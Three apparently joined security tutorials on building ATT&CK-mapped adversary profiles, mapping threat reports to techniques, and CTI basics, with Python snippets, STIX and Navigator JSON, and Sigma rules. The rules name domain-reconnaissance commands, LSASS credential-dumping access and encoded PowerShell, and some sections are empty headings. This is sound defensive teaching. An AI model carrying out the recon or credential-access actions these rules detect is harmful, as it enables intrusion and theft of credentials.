APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence

Objective: Learn how to systematically collect, structure, and operationalize open-source intelligence into a complete, ATT&CK-mapped adversary profile — a defensible dossier that drives realistic adversary emulation, detection-gap analysis, and threat-informed defense.

1. What Is an Adversary Profile and Why Build One

An adversary profile is a structured dossier describing who a threat actor is, what they target, how they operate, and which tools and infrastructure they favor — all normalized to a shared taxonomy. It is the durable opposite of an IOC-only feed.

An IOC feed gives you hashes and IP addresses that expire in days. A profile captures the actor’s tactics, techniques, and procedures (TTPs), which change slowly and cost the adversary real effort to alter. A finished profile is the source artifact for three downstream activities:

• Adversary emulation — sequencing a real group’s TTPs into a test plan.
• Detection engineering — overlaying the profile against your sensor coverage to find gaps.
• Risk communication — translating actor capability and intent for leadership.

Threat intelligence comes in four flavors, and a good profile feeds all of them: strategic (executive risk), tactical (SOC TTPs), operational (incident-response context), and technical (machine-readable indicators).

2. The Intelligence Lifecycle Applied to APT Profiling

Cyber threat intelligence is produced through a six-phase lifecycle. Profiling is just this lifecycle scoped to a single actor.

Start with an explicit Priority Intelligence Requirement (PIR) or Request for Information (RFI). Without a scoped question, collection sprawls and the profile never converges.

3. Analytical Frameworks: Diamond Model, Kill Chain, and ATT&CK

Three frameworks provide complementary lenses. Use all three — they are not interchangeable.

The Diamond Model is the pivoting engine. Each intrusion event has four interconnected vertices, and the relationships between them drive investigation. The adversary–infrastructure edge reveals how operators stand up C2; the victim–capability edge exposes which tooling is used against which target. Unlike the sequential Kill Chain, the Diamond Model excels at attribution and visualizing relationships — pivot from a known malware sample to the infrastructure that served it, then to other victims of the same infrastructure.

ATT&CK then supplies the granular vocabulary that makes those pivots comparable across reports and across teams.

4. OSINT Collection: Primary Source Taxonomy

OSINT spans news media, social media, public records, government publications, academic research, commercial data, and the deep/dark web. For APT profiling, prioritize these primary source classes and score each for reliability.

Infrastructure pivoting is largely passive. The example below queries Shodan for hosts matching a documented C2 fingerprint — a benign illustration of the adversary–infrastructure edge.

import shodan

API_KEY = "YOUR_API_KEY"      # placeholder — never commit real keys
api = shodan.Shodan(API_KEY)

# Pivot on a publicly documented C2 framework fingerprint
query = 'product:"Cobalt Strike Beacon" ssl.cert.subject.CN:"example-c2.test"'
results = api.search(query)

for host in results["matches"]:
    print(host["ip_str"], host.get("port"), host.get("org"))

Rate every source with the Admiralty Code: source reliability (A–F) and information credibility (1–6). A single vendor blog is B2 at best; corroboration across two independent vendors plus a government advisory raises confidence.

5. Building the Adversary Dossier

Capture the profile in a fixed schema so that every actor is described the same way and TTP heatmaps are comparable. Use this template as your reference document.

ATT&CK’s Group object aligns directly with several of these fields, so anchor your dossier to it.

ATT&CK currently tracks 176 groups, each with attribution, targeted geographies, and targeted sectors.

6. ATT&CK Mapping: Extracting and Normalizing Techniques

Follow CISA’s Best Practices for MITRE ATT&CK Mapping: read the report, find the behavior, then map to the most specific technique the evidence supports. The cardinal sin is over-mapping — claiming a sub-technique when the text only justifies a tactic.

A conceptual keyword-to-technique pass illustrates semi-automated extraction. This is not a production NLP classifier; treat it as a triage aid that an analyst validates.

import json

# Local ATT&CK Enterprise snapshot (STIX bundle) loaded for ID validation
with open("enterprise-attack.json") as f:
    bundle = json.load(f)

# Illustrative keyword -> technique lookup, manually curated
keyword_map = {
    "spearphishing attachment": "T1566.001",
    "powershell":               "T1059.001",
    "wmi":                      "T1047",
    "scheduled task":          "T1053.005",
    "lsass":                   "T1003.001",
}

report = """The actor sent a spearphishing attachment, used PowerShell to
run a loader, registered a scheduled task for persistence, and dumped
credentials from LSASS."""

report_l = report.lower()
hits = sorted({tid for kw, tid in keyword_map.items() if kw in report_l})
print(hits)   # ['T1003.001', 'T1053.005', 'T1059.001', 'T1566.001']

Every machine-suggested ID gets human confirmation against the report sentence before it enters the profile.

7. Querying ATT&CK Group Data Programmatically

MITRE publishes ATT&CK as STIX. Pull a group’s techniques directly with mitreattack-python rather than scraping the website.

from mitreattack.stix20 import MitreAttackData

mitre = MitreAttackData("enterprise-attack.json")

# Resolve the documented group by alias (use real, attributed groups only)
group = mitre.get_groups_by_alias("APT29")[0]   # G0016

techniques = mitre.get_techniques_used_by_group(group.id)
for entry in techniques:
    tech = entry["object"]
    attack_id = mitre.get_attack_id(tech.id)
    print(attack_id, tech.name)

You can also reach the live TAXII 2.1 server and walk the relationship graph yourself — pivoting intrusion-set → uses → attack-pattern.

from taxii2client.v21 import Server
from stix2 import TAXIICollectionSource, Filter

server = Server("https://attack-taxii.mitre.org/api/v21/")
collection = server.api_roots[0].collections[0]   # Enterprise ATT&CK
src = TAXIICollectionSource(collection)

group = src.query([Filter("type", "=", "intrusion-set"),
                   Filter("name", "=", "APT29")])[0]

for rel in src.relationships(group.id, "uses", source_only=True):
    if rel.target_ref.startswith("attack-pattern"):
        print(src.get(rel.target_ref).name)

8. ATT&CK Navigator Layers and Coverage Gap Analysis

The ATT&CK Navigator renders technique sets as a heatmap. Export a group’s techniques as a layer JSON, score each by observed frequency, and drag the file into the Navigator web app. Below is a v4 layer for a documented group.

{
  "name": "G0016 APT29 - Observed TTPs",
  "versions": { "attack": "14", "navigator": "4.9.1", "layer": "4.5" },
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1566.001", "score": 5, "color": "#fc3b3b",
      "comment": "Spearphishing attachment - multiple campaigns" },
    { "techniqueID": "T1059.001", "score": 4, "color": "#fc6b3b",
      "comment": "PowerShell loaders" },
    { "techniqueID": "T1003.001", "score": 3, "color": "#fc9d3b",
      "comment": "LSASS credential access" }
  ],
  "gradient": {
    "colors": ["#ffffff", "#fc3b3b"], "minValue": 0, "maxValue": 5
  }
}

The power move is layer arithmetic: load the actor layer and your team’s detection coverage layer, then compute their difference. Techniques the actor uses that your sensors do not cover are your prioritized hardening backlog. Overlaying two actor layers instead reveals shared TTPs worth emulating once to cover multiple threats.

9. Structuring the Profile in STIX 2.1

To make the profile machine-readable and shareable over TAXII, serialize it as STIX. Platforms such as MISP, OpenCTI, ThreatConnect, and Anomali ThreatStream ingest this directly.

{
  "type": "bundle", "id": "bundle--6f3a...",
  "objects": [
    { "type": "intrusion-set", "spec_version": "2.1",
      "id": "intrusion-set--1a2b...", "name": "APT29",
      "aliases": ["Cozy Bear"] },
    { "type": "attack-pattern", "spec_version": "2.1",
      "id": "attack-pattern--3c4d...", "name": "Spearphishing Attachment",
      "external_references": [
        { "source_name": "mitre-attack", "external_id": "T1566.001" } ] },
    { "type": "malware", "spec_version": "2.1",
      "id": "malware--5e6f...", "name": "WELLMESS",
      "is_family": true, "malware_types": ["backdoor"] },
    { "type": "relationship", "spec_version": "2.1",
      "id": "relationship--7a8b...", "relationship_type": "uses",
      "source_ref": "intrusion-set--1a2b...",
      "target_ref": "attack-pattern--3c4d..." }
  ]
}

10. The Pyramid of Pain and Attribution Confidence

David Bianco’s Pyramid of Pain (2013) explains why TTP-based profiling outlasts IOC-based profiling. From the bottom (trivial for the adversary to change) to the top (expensive and painful):

• Hash values → trivially recompiled
• IP addresses → rotated in minutes
• Domain names → re-registered cheaply
• Network/host artifacts → moderate effort
• Tools → significant rework
• TTPs → the adversary must relearn how they operate

Profiling for the top of the pyramid forces the adversary to change behavior, not just infrastructure. That is the entire defensive case for TTP-centric profiles.

Treat attribution skeptically. Multiple vendors track overlapping activity under different names, and their group boundaries may disagree. Record an explicit confidence rating (Admiralty Code or an Assessed/Confirmed scale) per claim, and never collapse two vendor clusters into “the same actor” without corroboration.

11. From Profile to Emulation Plan

The finished profile drives an emulation plan in the style of the CTID Adversary Emulation Library. Translate the TTP heatmap into a prioritized, sequenced scenario:

• Sequence techniques along the Kill Chain — initial access, execution, persistence, credential access, exfiltration.
• Prioritize by impact, current detection coverage (from the Navigator gap analysis), and business relevance.
• Constrain the plan to documented behaviors; emulate procedures, not improvised tradecraft.

The output is a runnable, scoped test that exercises exactly the techniques your real adversary uses — and validates the detections you built from the same profile.

12. Common Attacker Techniques

A profile must capture what the adversary does during its own reconnaissance and resource development — the pre-attack behaviors you study and emulate.

13. Defensive Strategies & Detection

Profiling cuts both ways: detect adversaries profiling you, and validate coverage against a finished profile. Correlate weak recon signals across categories — perimeter scanning (T1595), web fingerprinting (T1592), and email harvesting (T1589) together indicate targeted pre-attack planning.

Host-based recon once inside is visible to Sysmon: Event ID 1 (Process Create) catches nslookup, nltest, net view; Event ID 3 (Network Connection) surfaces internal scanning; Event ID 22 (DNS Query) enumerates lookups. Enable Audit Directory Service Access and command-line auditing (4688).

title: Domain Trust and Group Reconnaissance via Built-in Tools
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    CommandLine|contains:
      - 'nltest /domain_trusts'
      - 'net group "domain admins"'
      - 'net view /domain'
  condition: selection
level: medium

Centralize network, endpoint, identity, and threat-intel telemetry into one analytics platform, and ingest the profile’s STIX into a TIP (MISP/OpenCTI) so IOCs correlate against live data automatically. Reduce your OSINT attack surface: prune public DNS records, enable WHOIS privacy, and strip version banners.

14. Tools for Adversary Profiling

15. MITRE ATT&CK Mapping

Summary

• An adversary profile is a structured, ATT&CK-mapped dossier of actor identity, targeting, tooling, and TTPs — the durable artifact IOC feeds cannot replace.
• Run the six-phase intelligence lifecycle and fuse three frameworks: the Diamond Model for pivoting, the Kill Chain for sequencing, and ATT&CK for the TTP taxonomy.
• Collect from vendor reports, government advisories, passive DNS, and malware repositories — and score every source with the Admiralty Code.
• Serialize the result as STIX 2.1 and a Navigator layer so it feeds TIPs, gap analysis, and CTID-style emulation plans.
• Detect adversaries profiling you with correlated recon signals — Sysmon Event IDs 1/3/22, honeytokens, and Cert Transparency monitoring — and profile for the top of the Pyramid of Pain, where changing TTPs costs the adversary the most.

Related Tutorials

• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle
• Adversary Emulation vs. Adversary Simulation: Definitions, Differences, and Why It Matters
• Phishing Campaign Design: Pretexting, Lures, and Target Profiling
• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology

References

• Adversary Emulation Plans | MITRE ATT&CK®
• Groups | MITRE ATT&CK®
• NIST SP 800-150: Guide to Cyber Threat Information Sharing | CSRC
• Getting Started with ATT&CK: Threat Intelligence | MITRE ATT&CK Blog
• MITRE ATT&CK Campaigns | MITRE ATT&CK®
• MITRE CTID — Adversary Emulation Library (GitHub)

Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology

Objective: Learn to parse a real-world cyber threat intelligence (CTI) report and systematically translate its narrative behaviors into precise MITRE ATT&CK tactics, techniques, and sub-techniques — producing an accurate, reusable TTP layer that drives detection engineering, threat hunting, and adversary emulation planning.

1. Why TTP Mapping Matters More Than IOCs

Traditional Indicators of Compromise (IOCs) — hashes, IP addresses, domains — are brittle. An adversary rotates infrastructure and recompiles payloads cheaply, so a hash-based detection expires the moment the campaign moves. Tactics, Techniques, and Procedures (TTPs) describe behavior, which is far costlier for an adversary to change. Re-tooling how you dump LSASS or beacon over HTTPS is expensive; swapping a C2 IP is trivial.

MITRE ATT&CK encodes this behavioral layer into a shared vocabulary. When you map a CTI report to ATT&CK, you convert prose (“the actor ran an encoded PowerShell loader”) into a stable, machine-referenceable identifier (T1059.001) that every tool, team, and report understands. That identifier outlives the campaign and feeds detection, hunting, and emulation directly.

2. ATT&CK Architecture: Tactics, Techniques, Sub-techniques, and Procedures

ATT&CK is a knowledge base of adversary behavior built on three structural levels.

A procedure is the real-world, in-the-wild instance of a technique — the exact way a named group performed it. Procedures appear on each technique page as cited examples.

The 14 Enterprise Tactics

Technique IDs follow the T#### convention; sub-techniques append .### (e.g., T1021, T1059.003). These identifiers standardize communication across detection engineering, intelligence reporting, and red team planning. ATT&CK is versioned — IDs can be deprecated or renumbered across major releases — so always verify against the live matrix at attack.mitre.org.

3. Sourcing and Preparing a CTI Report for Analysis

CTI arrives at three altitudes. Strategic intelligence describes who and why at a board level. Operational intelligence describes campaign-level capability and intent. Tactical intelligence — vendor incident reports, CISA advisories, ISAC bulletins, OSINT write-ups — describes the granular actions you can actually map.

A report is mappable when it describes what the adversary did, not just what it was. Strip attribution bias: the goal is behavior, not a flag. Before mapping, read the full report once end-to-end, then segment the narrative into discrete adversary actions. Each action is a candidate for one or more ATT&CK techniques.

4. The Four-Step Mapping Methodology

CISA’s Best Practices for MITRE ATT&CK Mapping defines a canonical four-step loop. Run it once per behavior.

1. Identify the behavior — extract what the adversary did from the narrative, quoting the source verbatim.
2. Research the behavior — understand the technical action being described; resolve vendor jargon to a concrete mechanism.
3. Translate the behavior into a tactic — identify the adversary’s goal (the why).
4. Identify the technique and sub-technique — match the how against the matrix.

Worked example. Take the narrative: “The actor delivered a spearphishing attachment, then executed an obfuscated PowerShell loader and accessed LSASS memory with a renamed procdump binary.”

Automation helps the first pass. The script below surfaces candidate tactics from raw text — a triage aid, never a final answer.

# First-pass triage only — surfaces CANDIDATE tactics for manual review.
TACTIC_KEYWORDS = {
    "TA0001": ["phishing", "spearphishing", "supply chain", "exploited public"],
    "TA0002": ["powershell", "executed", "ran script", "command interpreter"],
    "TA0005": ["obfuscated", "base64", "encoded", "disabled logging"],
    "TA0006": ["lsass", "credential", "dumped", "mimikatz"],
    "TA0011": ["beacon", "c2", "https post", "command and control"],
}

def candidate_tactics(report_text: str):
    text = report_text.lower()
    return {ta: [w for w in words if w in text]
            for ta, words in TACTIC_KEYWORDS.items()
            if any(w in text for w in words)}

excerpt = ("The actor used a spearphishing attachment, then ran an "
           "obfuscated PowerShell loader and dumped LSASS memory.")
for ta, words in candidate_tactics(excerpt).items():
    print(ta, "->", words)

If a sub-technique is not easily identifiable — and there may not be one in every case — review the procedure examples on the technique page. They link the source CTI reports behind the original mapping and may affirm your choice or suggest an alternative. There is always a possibility a behavior is a new technique not yet covered in ATT&CK.

5. Disambiguation: Choosing the Right Technique When Multiple Apply

Ambiguity is the hard part. One behavior frequently maps to several tactics. T1078 Valid Accounts spans Initial Access (TA0001), Persistence (TA0003), Privilege Escalation (TA0004), and Defense Evasion (TA0005) — the correct tactic depends on what the account was used for in that step, not the account itself.

Rules of thumb:

• Map to the tactic that matches the adversary’s goal at that moment, not every goal the technique can serve.
• Prefer the technique level when the report lacks the detail to justify a sub-technique. Forcing T1003.001 when the report only says “stole credentials” is over-mapping.
• Use the procedure examples to calibrate. If your behavior reads nothing like the cited procedures, re-investigate.
• T1218 System Binary Proxy Execution and T1027 Obfuscated Files or Information often co-occur with execution techniques — record them as distinct Defense Evasion entries rather than collapsing them.

6. The Analyst Mapping Worksheet

The core analyst deliverable is a worksheet that preserves the audit trail from quote to ID. Confidence and rationale columns make the mapping reviewable.

This worksheet becomes the source of truth that all downstream artifacts — Navigator layers, Sigma rules, emulation plans — derive from.

7. Tooling: ATT&CK Navigator, Decider, and the STIX/TAXII API

ATT&CK Navigator is MITRE’s web tool for visually annotating the matrix. You represent a mapped TTP set as a versioned layer JSON — a portable, diff-able artifact you commit to version control.

{
  "name": "APT-Sample CTI Mapping",
  "versions": { "attack": "16", "navigator": "5.1.0", "layer": "4.5" },
  "domain": "enterprise-attack",
  "description": "TTPs extracted from CTI report; scored by confidence.",
  "techniques": [
    { "techniqueID": "T1566.001", "score": 100, "color": "#e60d0d",
      "comment": "Spearphishing attachment delivered loader (High)" },
    { "techniqueID": "T1059.001", "score": 100, "color": "#e60d0d",
      "comment": "Obfuscated PowerShell stager (High)" },
    { "techniqueID": "T1003.001", "score": 75, "color": "#e68a0d",
      "comment": "LSASS access via renamed procdump (Medium)" }
  ]
}

CISA Decider eases disambiguation by asking a series of guided questions about adversary activity, walking you to the correct tactic, technique, or sub-technique — invaluable when an analyst is uncertain.

For programmatic work, query the public read-only TAXII 2.1 endpoint (https://attack-taxii.mitre.org/, Enterprise collection x-mitre-collection--1f5f1533-f617-4ca8-9ab4-6a02367fa019). The ATT&CK dataset is STIX 2.1 JSON: techniques are attack-pattern objects, groups are intrusion-set, software is malware / tool. Pull techniques attributed to a group to cross-check your mapping against MITRE’s own group profile.

from mitreattack.stix20 import MitreAttackData

# Load the Enterprise STIX 2.1 bundle (download once from attack-stix-data)
attack = MitreAttackData("enterprise-attack.json")

# Resolve a threat group alias to its intrusion-set object
group = attack.get_groups_by_alias("APT29")[0]

# Enumerate every technique attributed to the group
for t in attack.get_techniques_used_by_group(group["id"]):
    obj = t["object"]
    print(attack.get_attack_id(obj["id"]), "\t", obj["name"])

8. From TTP Map to Adversary Profile

Aggregate worksheets across an entire campaign to build an adversary profile. Correlate your mapped techniques against the relevant ATT&CK Groups page to validate consistency and surface techniques the actor is known to use but the report omitted. Score the aggregated layer by frequency or confidence to produce a TTP heat map, then prioritize against your priority intelligence requirements (PIRs). The heat map feeds directly into detection gap analysis.

import csv, json

# Load the mapped TTP layer and the internal detection inventory
layer = json.load(open("cti_layer.json"))
covered = set()
with open("detection_coverage.csv") as fh:            # cols: technique_id, rule_name
    for row in csv.DictReader(fh):
        covered.add(row["technique_id"])

print("TechniqueID\tCovered")
for t in layer["techniques"]:
    tid = t["techniqueID"]
    print(f"{tid}\t{tid in covered}")

9. Quality Assurance: Peer Review and Common Mapping Errors

A formal peer review of an annotated report shares perspectives, promotes learning, and improves accuracy. A second analyst routinely catches TTPs missed in the first pass and enforces mapping consistency across the team.

Watch for these recurring errors:

• Over-mapping — assigning techniques the report does not support.
• Under-mapping — missing key behaviors buried in the narrative.
• Conflating technique with tactic — recording a goal where a behavior belongs.
• Misidentifying sub-techniques — forcing .### granularity the source lacks.
• Mapping to deprecated techniques — always validate against the current ATT&CK version.

10. Common Attacker Techniques in CTI Reports

These behaviors dominate tactical CTI and should be in every analyst’s recognition vocabulary.

11. Defensive Strategies & Detection

The output of mapping is a prioritized list of behaviors to detect. Each ATT&CK technique page lists Data Sources (e.g., DS0009 Process, DS0011 Module, DS0017 Command, DS0022 File, DS0028 Logon Session, DS0029 Network Traffic) and Mitigations (e.g., M1038 Execution Prevention, M1026 Privileged Account Management). Pull these per technique to convert the map into telemetry requirements and hardening tasks.

Sysmon Events Tied to Mapped Behaviors

Enable the supporting Windows audit policies: Audit Process Creation (Event ID 4688 with command line), Audit Logon Events (4624/4625/4648 for T1078), Audit Object Access → SAM (4661 for T1003), and PowerShell Script Block Logging (4104 for T1059.001).

A Sigma rule operationalizes one mapped technique. Tags follow attack.t1003_001 (lowercase, underscore for the sub-technique separator) and attack.ta0006 for the tactic.

title: Cross-Process Access to LSASS Memory
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess: '0x1410'
  condition: selection
tags:
  - attack.t1003_001
  - attack.ta0006
level: high

Feed the completed layer into DeTT&CT (Detect Tactics, Techniques & Combat Threats) to align mapped TTPs against your data source visibility and detection coverage — the natural follow-on to mapping. The same layer drives the red team emulation plan, ensuring offensive testing exercises the exact behaviors the CTI reported.

12. Tools for CTI Mapping Analysis

13. MITRE ATT&CK Mapping Reference

Summary

• CTI-to-ATT&CK mapping converts perishable IOCs into durable, behavioral TTPs that survive across campaigns and standardize defensive communication.
• ATT&CK is structured as tactics (the why), techniques (the how), and sub-techniques (granular methods), each with stable TA#### / T####.### identifiers.
• The CISA four-step loop — identify, research, translate to tactic, identify technique — produces an auditable mapping worksheet that anchors every downstream artifact.
• Navigator layers, CISA Decider, and the public TAXII 2.1 STIX endpoint operationalize and version-control the mapping; peer review guards against over-mapping, under-mapping, and tactic/technique confusion.
• The finished TTP map drives detection engineering directly — pulling ATT&CK Data Sources, Sysmon Event IDs, audit policies, and Sigma rules per technique, and feeding DeTT&CT coverage analysis and emulation plans.

Related Tutorials

• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• Navigating ATT&CK Navigator: Building, Annotating, and Exporting Technique Layers
• Introduction to MITRE ATT&CK: Structure, Tactics, Techniques, and Sub-Techniques
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Passive OSINT: Mapping the Target Without Touching It

References

• Best Practices for MITRE ATT&CK® Mapping (CISA)
• MITRE ATT&CK® – Get Started: Threat Intelligence
• MITRE ATT&CK® – Get Started: Adversary Emulation and Red Teaming
• MITRE ATT&CK® – Adversary Emulation Plans
• Getting Started with ATT&CK: Threat Intelligence (Official MITRE ATT&CK® Blog)
• Center for Threat-Informed Defense – Adversary Emulation Library (GitHub)

Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle

Objective: Understand what Cyber Threat Intelligence is, the four intelligence types, the six-phase intelligence lifecycle, primary collection sources, the exchange standards (STIX/TAXII/TLP), and the analytic frameworks — Kill Chain, Diamond Model, Pyramid of Pain, and MITRE ATT&CK — that let defenders and authorized red teamers operationalize intelligence into detection.

1. What Is CTI? (And What It Is Not)

Cyber Threat Intelligence is evidence-based knowledge about adversaries — their capabilities, infrastructure, motivations, and behaviors — refined to support decisions. CTI is not a raw feed of IP addresses, and it is not a SIEM alert. It is the product of a deliberate analytic process.

The distinction is a pipeline:

• Data — discrete, context-free observations (a hash, a domain, a log line).
• Information — data aggregated and given context (a domain resolving to a host serving a known dropper).
• Intelligence — analyzed information answering a stakeholder question (“Is the group behind this dropper targeting our sector, and can our controls detect them?”).

CTI exists to reduce uncertainty for a decision-maker. If a piece of output does not change a defensive action, an investment, or a hunt hypothesis, it is information — not intelligence.

2. The Four Intelligence Types

CTI is stratified by audience and shelf-life. The four-type model (used by NIST SP 800-150 and several vendors) cleanly separates human-consumable TTPs from machine-consumable IOCs.

Trace one actor across all four levels. Strategic: “An espionage group aligned with Nation X is escalating against the energy sector.” Operational: “That group is running a spearphishing campaign against utility OT vendors this quarter.” Tactical: “They use T1566.001 (Spearphishing Attachment) followed by T1059.001 (PowerShell) for execution.” Technical: “The current dropper SHA-256 is e3b0c4... and the C2 domain is cdn-update.example.”

Note the inversion of value and durability: technical IOCs are the most actionable but decay in minutes; strategic intelligence shapes decisions for years.

3. CTI Sources: Where the Data Comes From

CTI is collected across the classic intelligence disciplines, adapted to the cyber domain.

Additional subcategories include measurement-and-signature intelligence, social-media intelligence (SOCMINT), geospatial intelligence (GEOINT), and Deep/Dark Web intelligence.

Sharing communities multiply source value. Sharing anonymized insights with trusted partners — notably Information Sharing and Analysis Centers (ISACs) — helps peers prepare for the same threats. Sector examples include FS-ISAC (financial services), H-ISAC (health), and E-ISAC (electricity). Membership turns one organization’s incident into the whole sector’s early warning.

4. The Intelligence Lifecycle (Six Phases)

The lifecycle is a continuous loop. Output from one cycle refines the inputs of the next.

The feedback loop is what separates an intelligence program from an IOC firehose. If the SOC reports that disseminated intelligence never fired a single detection, the next planning phase re-scopes collection.

Governing standard: NIST SP 800-150 (Guide to Cyber Threat Information Sharing) establishes governance, legal, and technical best practices for inter-organizational sharing. ISO/IEC 27001:2022 Control 5.7 formally requires organizations to collect, analyze, and share relevant threat intelligence — making a documented lifecycle a compliance artifact, not just good hygiene.

5. Intelligence Formats & Sharing Standards

Machine-to-machine sharing requires structure. Four standards govern format, transport, and handling.

STIX models intelligence as graph objects. STIX Domain Objects (SDOs) are the nodes; STIX Relationship Objects (SROs) are the edges.

Building a STIX 2.1 Bundle (Python):

from stix2 import ThreatActor, AttackPattern, Relationship, Bundle

actor = ThreatActor(
    name="Fictitious Bear",
    description="Illustrative espionage group (teaching example)",
    threat_actor_types=["nation-state"],
)

technique = AttackPattern(
    name="Spearphishing Attachment",
    external_references=[{
        "source_name": "mitre-attack",
        "external_id": "T1566.001",   # technique reference
    }],
)

# SRO: actor 'uses' technique
uses = Relationship(actor, "uses", technique)

bundle = Bundle(actor, technique, uses)
print(bundle.serialize(pretty=True))

A minimal STIX 2.1 Indicator (JSON):

{
  "type": "indicator",
  "spec_version": "2.1",
  "id": "indicator--8e2e2d2b-17d4-4cbf-938f-98ee46b3cd3f",
  "created": "2026-01-15T12:00:00.000Z",
  "modified": "2026-01-15T12:00:00.000Z",
  "name": "Dropper file hash (fictitious)",
  "indicator_types": ["malicious-activity"],
  "pattern": "[file:hashes.'SHA-256' = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855']",
  "pattern_type": "stix",
  "valid_from": "2026-01-15T12:00:00Z"
}

TLP discipline is operational, not decorative. TLP:RED intelligence must never be imported into a shared SIEM tenant or multi-tenant TIP. TAXII 2.1 collections are pulled over HTTPS with a bearer token (Authorization: Bearer <token>); enforce TLP at ingestion so a marking can never be stripped downstream.

6. Analytic Frameworks: Kill Chain, Diamond Model, Pyramid of Pain

Frameworks impose structure on raw observations. Each answers a different question.

The Lockheed Martin Cyber Kill Chain (Hutchins et al., 2011) models an intrusion as seven sequential phases: Reconnaissance → Weaponization → Delivery → Exploitation → Installation → Command & Control → Actions on Objectives. Use it to check coverage balance — an adversary who evades detection at Delivery should still trip a control at C2.

The Diamond Model of Intrusion Analysis (Caltagirone, Pendergast, Betz — articulated 2006, published 2013) conceptualizes any event as relationships between four vertices: Adversary, Capability, Infrastructure, Victim. It is predictive: known three vertices often imply the fourth.

The Pyramid of Pain (David Bianco, 2013) ranks indicators by how much pain their loss causes the adversary:

                    /\
                   /  \   TTPs ............... hardest to change (apex)
                  /----\
                 / Tools \  Cobalt Strike, Mimikatz, malware families
                /--------\
               / Network &  \  JA3, URI patterns, registry keys, named pipes
              /  Host Artifacts\
             /------------------\
            /   Domain Names      \  trivial to rotate
           /----------------------\
          /  IP Addresses           \  trivial to rotate
         /--------------------------\
        /   Hash Values               \  changed in seconds (base)
       /------------------------------\

Hashes and IPs sit at the base — trivial detection value, replaced in seconds. TTPs occupy the apex: forcing an adversary to abandon PowerShell-based execution or spearphishing imposes real engineering cost. This is the strategic argument for behavior-based detection.

7. MITRE ATT&CK as a CTI Backbone

MITRE ATT&CK is a globally accessible knowledge base of adversary behaviors built from real-world observation. Unlike IOC-centric models, it focuses on TTPs — a behavioral approach. Every technique carries a stable ID such as T1021 or T1059.003, giving detection engineering, reporting, and red-team planning a shared vocabulary.

Key ATT&CK objects in CTI workflows:

• Groups (intrusion-set) — e.g., APT29 (G0016), APT41 (G0096), Lazarus Group (G0032)
• Software (malware/tool) — e.g., Cobalt Strike (S0154), Mimikatz (S0002)
• Campaigns (campaign) — e.g., C0017, C0018
• Techniques — e.g., T1566 (Phishing), T1071.001 (Web Protocols C2), T1003 (OS Credential Dumping)

ATT&CK ships as STIX, so it is programmatically queryable. Enumerate every technique attributed to a group:

from mitreattack.stix20 import MitreAttackData

attack = MitreAttackData("enterprise-attack.json")
group = attack.get_groups_by_alias("APT29")[0]
techniques = attack.get_techniques_used_by_group(group.id)

for t in techniques:
    tech = t["object"]
    tid = tech.external_references[0].external_id
    print(f"{tid}\t{tech.name}")

Feed the resulting technique list into ATT&CK Navigator to build a heat-map. Overlay your detection coverage against the group’s TTPs and the gaps become your next intelligence requirements.

8. From Intelligence to Detection: Operationalizing CTI

Intelligence that never reaches a sensor is wasted. The pipeline is: ATT&CK technique → detection hypothesis → log source → detection rule.

Take T1059.001 (PowerShell). Hypothesis: encoded command execution is rare in this environment and worth alerting. Log source: PowerShell Script Block Logging (Event ID 4104). Rule:

title: Suspicious PowerShell Encoded Command Execution
id: 6e8a1f3c-2b7d-4f9a-9c1e-0a2b3c4d5e6f
status: experimental
logsource:
  product: windows
  service: powershell
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains:
      - '-enc '
      - 'FromBase64String'
  condition: selection
level: high
tags:
  - attack.execution
  - attack.t1059.001

Every Sigma rule tied to a technique is a step up the Pyramid of Pain. The tags field (attack.<tactic>, attack.t<technique>) keeps each rule linked to the framework, so coverage roll-up is automatic.

Invest accordingly: spend disposable effort on IOC matching (high churn, low pain to adversary) and durable engineering effort on TTP detections (low churn, high pain). STIX/TAXII feeds drive SIEM/SOAR enrichment so analysts triage against context instead of researching every artifact by hand.

9. CTI for Red Teams and Defenders: Two Sides of the Same Brief

Adversary emulation is CTI consumed offensively. A red team ingests a finished report on “Fictitious Bear,” extracts the ATT&CK technique set, and emulates only those TTPs to validate whether controls fire. The blue team consumes the identical brief to confirm the same detections exist. One brief, two scopes, one shared technique vocabulary.

Scope is a legal control, not a courtesy. Emulation must stay inside an authorized rules-of-engagement document. Respect TLP on the source intelligence: a TLP:AMBER report informs an internal exercise but cannot be republished in a public write-up.

10. Common Attacker Techniques

Adversaries run their own intelligence cycle against you. CTI teams must practice counter-intelligence awareness.

Counter-intelligence implication: assume your public footprint (and your IOC feeds) are adversary collection targets. Watch for reconnaissance against your own brand and credentials.

11. Defensive Strategies & Detection

CTI is itself a defensive discipline. Operationalize feeds against host and network telemetry.

Sysmon Event IDs for IOC operationalization:

ETW providers for TTP-level hunting: Microsoft-Windows-DNS-Client (domain IOC matching), Microsoft-Windows-PowerShell/Operational (T1059.001), and Microsoft-Windows-Sysmon/Operational (broad process/network/file telemetry).

Audit policy: enable Audit Process Creation (Success) for process-IOC correlation, and turn on PowerShell Script Block Logging via GPO for behavioral visibility.

A Sigma rule matching a CTI-sourced malicious domain against DNS telemetry:

title: DNS Query to CTI-Listed Malicious Domain
id: 1f2a3b4c-5d6e-7f80-91a2-b3c4d5e6f708
status: experimental
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 22
    QueryName|endswith:
      - 'cdn-update.example'    # fictitious C2 domain
  condition: selection
level: high
tags:
  - attack.command_and_control
  - attack.t1071.001

Program controls: enforce TLP at ingestion in the TIP; gate raw IOC feeds behind de-duplication and decay scoring before SIEM import; run an intelligence-requirement review tied to ATT&CK Navigator coverage gaps; and use the Kill Chain quarterly to check detection balance across the attack lifecycle.

12. Tools for CTI Analysis

13. MITRE ATT&CK Mapping

14. Summary

